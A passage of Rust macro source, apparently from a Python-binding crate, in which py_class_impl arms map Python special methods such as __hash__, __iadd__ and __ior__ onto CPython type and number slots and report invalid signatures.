$crate::py_class_impl_item! { $class, $py, pub, __getitem__(&$slf,) $res_type; { $($body)* } [{ $key : $key_name = {} }] }
}
$members $props
}};
{ { def __getitem__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __getitem__" }
};
{ { def __gt__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__gt__ is not supported by py_class! use __richcmp__ instead." }
};
{ { def __hash__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
/* type_slots */ [ $( $tp_slot_name:ident : $tp_slot_value:expr, )* ]
$as_number:tt $as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
/* type_slots */ [
$( $tp_slot_name : $tp_slot_value, )*
tp_hash: $crate::py_class_unary_slot!($class::__hash__, $crate::Py_hash_t, $crate::py_class::slots::HashConverter),
]
$as_number $as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __hash__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __hash__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __hash__" }
};
{ { def __iadd__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_add: $crate::py_class_binary_slot!($class::__iadd__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iadd__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __iadd__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_add: $crate::py_class_binary_slot!($class::__iadd__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iadd__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __iadd__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_add: $crate::py_class_binary_slot!($class::__iadd__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iadd__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __iadd__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __iadd__" }
};
{ { def __iand__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_and: $crate::py_class_binary_slot!($class::__iand__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iand__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __iand__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_and: $crate::py_class_binary_slot!($class::__iand__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iand__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __iand__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_and: $crate::py_class_binary_slot!($class::__iand__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __iand__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __iand__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __iand__" }
};
{ { def __idiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__idiv__ is not supported by py_class! yet." }
};
{ { def __ifloordiv__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_floor_divide: $crate::py_class_binary_slot!($class::__ifloordiv__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ifloordiv__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __ifloordiv__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_floor_divide: $crate::py_class_binary_slot!($class::__ifloordiv__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ifloordiv__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __ifloordiv__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_floor_divide: $crate::py_class_binary_slot!($class::__ifloordiv__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ifloordiv__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __ifloordiv__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __ifloordiv__" }
};
{ { def __ilshift__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_lshift: $crate::py_class_binary_slot!($class::__ilshift__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ilshift__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __ilshift__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_lshift: $crate::py_class_binary_slot!($class::__ilshift__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ilshift__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __ilshift__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_lshift: $crate::py_class_binary_slot!($class::__ilshift__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ilshift__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __ilshift__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __ilshift__" }
};
{ { def __imatmul__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_matrix_multiply: $crate::py_class_binary_slot!($class::__imatmul__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imatmul__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __imatmul__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_matrix_multiply: $crate::py_class_binary_slot!($class::__imatmul__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imatmul__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __imatmul__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_matrix_multiply: $crate::py_class_binary_slot!($class::__imatmul__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imatmul__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __imatmul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __imatmul__" }
};
{ { def __imod__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_remainder: $crate::py_class_binary_slot!($class::__imod__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imod__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __imod__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_remainder: $crate::py_class_binary_slot!($class::__imod__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imod__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __imod__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_remainder: $crate::py_class_binary_slot!($class::__imod__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imod__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __imod__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __imod__" }
};
{ { def __imul__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_multiply: $crate::py_class_binary_slot!($class::__imul__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imul__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __imul__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_multiply: $crate::py_class_binary_slot!($class::__imul__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imul__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __imul__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_multiply: $crate::py_class_binary_slot!($class::__imul__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __imul__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __imul__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __imul__" }
};
{ { def __index__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_index: $crate::py_class_unary_slot!($class::__index__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __index__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __index__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __index__" }
};
{ { def __init__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__init__ is not supported by py_class!; use __new__ instead." }
};
{ { def __instancecheck__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__instancecheck__ is not supported by py_class! yet." }
};
{ { def __int__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__int__ is not supported by py_class! yet." }
};
{ { def __invert__(&$slf:ident) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_invert: $crate::py_class_unary_slot!($class::__invert__, *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __invert__(&$slf,) $res_type; { $($body)* } [] }
}
$members $props
}};
{ { def __invert__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __invert__" }
};
{ { def __ior__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_or: $crate::py_class_binary_slot!($class::__ior__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ior__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __ior__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_or: $crate::py_class_binary_slot!($class::__ior__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ior__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __ior__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_or: $crate::py_class_binary_slot!($class::__ior__, [$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __ior__(&$slf,) $res_type; { $($body)* } [{ $other : $other_name = {} }] }
}
$members $props
}};
{ { def __ior__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "Invalid signature for operator __ior__" }
};
{ { def __ipow__ $($tail:tt)* } $( $stuff:tt )* } => {
$crate::py_error! { "__ipow__ is not supported by py_class! yet." }
};
{ { def __irshift__(&$slf:ident, $other:ident : Option<&$other_name:ty>) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_rshift: $crate::py_class_binary_slot!($class::__irshift__, [Option<&$other_name>], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __irshift__(&$slf,) $res_type; { $($body)* } [{ $other : Option<&$other_name> = {} }] }
}
$members $props
}};
{ { def __irshift__(&$slf:ident, $other:ident : &$other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
/* as_number */ [
$( $nb_slot_name : $nb_slot_value, )*
nb_inplace_rshift: $crate::py_class_binary_slot!($class::__irshift__, [&$other_name], *mut $crate::_detail::ffi::PyObject, $crate::_detail::PyObjectCallbackConverter),
]
$as_sequence $as_mapping $setdelitem
}
/* impl: */ {
$($imp)*
$crate::py_class_impl_item! { $class, $py, pub, __irshift__(&$slf,) $res_type; { $($body)* } [{ $other : &$other_name = {} }] }
}
$members $props
}};
{ { def __irshift__(&$slf:ident, $other:ident : $other_name:ty) -> $res_type:ty { $($body:tt)* } $($tail:tt)* }
$class:ident $py:ident $info:tt
/* slots: */ {
$type_slots:tt
/* as_number */ [ $( $nb_slot_name:ident : $nb_slot_value:expr, )* ]
$as_sequence:tt $as_mapping:tt $setdelitem:tt
}
{ $( $imp:item )* }
$members:tt $props:tt
} => { $crate::py_class_impl! {
{ $($tail)* }
$class $py $info
/* slots: */ {
$type_slots
